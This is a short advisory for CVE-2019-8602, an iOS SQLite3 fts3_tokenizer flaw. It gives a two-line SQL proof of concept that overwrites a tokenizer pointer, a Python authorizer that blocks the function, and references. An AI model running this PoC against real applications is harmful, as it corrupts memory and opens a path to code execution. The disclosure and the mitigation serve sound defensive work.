CVE-2019-8602
Information
Compiled with the virtual table module FTS3, iOS’s SQLite3 exposes the function fts3_tokenizer().
Called with 2 arguments, it can register a new tokenizer or override an existing tokenizer's address.
Crash Dump:
PoC:
SELECT fts3_tokenizer('simple', x'4141414141414141');
CREATE VIRTUAL TABLE vt USING fts3 (content TEXT);
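One way for an application that embeds SQLite to refuse this function on connections that handle untrusted SQL, shown as an added example (it is not from the advisory and is not Apple's fix): a Python `sqlite3` authorizer that denies any call to fts3_tokenizer while the statement is being prepared, so the first PoC statement never runs. The helper names `deny_blocked_functions`, `open_hardened` and `try_sql` are assumptions made for illustration.

```python
import sqlite3

# Function named in the advisory. The authorizer sees only the function name,
# not the argument count, so every call to it is refused.
BLOCKED_FUNCTIONS = {"fts3_tokenizer"}


def deny_blocked_functions(action, arg1, arg2, dbname, source):
    """SQLite authorizer callback, consulted while a statement is prepared."""
    # For SQLITE_FUNCTION, arg1 is None and arg2 is the function name.
    if action == sqlite3.SQLITE_FUNCTION and (arg2 or "").lower() in BLOCKED_FUNCTIONS:
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK


def open_hardened(path=":memory:"):
    """Open a connection (hypothetical helper) with the authorizer installed."""
    conn = sqlite3.connect(path)
    conn.set_authorizer(deny_blocked_functions)
    return conn


def try_sql(conn, sql):
    """Run one statement and report whether SQLite accepted it."""
    try:
        conn.execute(sql).fetchall()
        return "allowed"
    except sqlite3.Error as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    conn = open_hardened()
    for sql in (
        "SELECT upper('ordinary query')",
        "SELECT fts3_tokenizer('simple', x'4141414141414141')",
    ):
        print(f"{try_sql(conn, sql):55} <- {sql}")
```

On a build where the function exists, the second statement fails with a not-authorized error; on a build without FTS3 it is rejected as an unknown function instead.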
Attachments:
Crash.png
References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/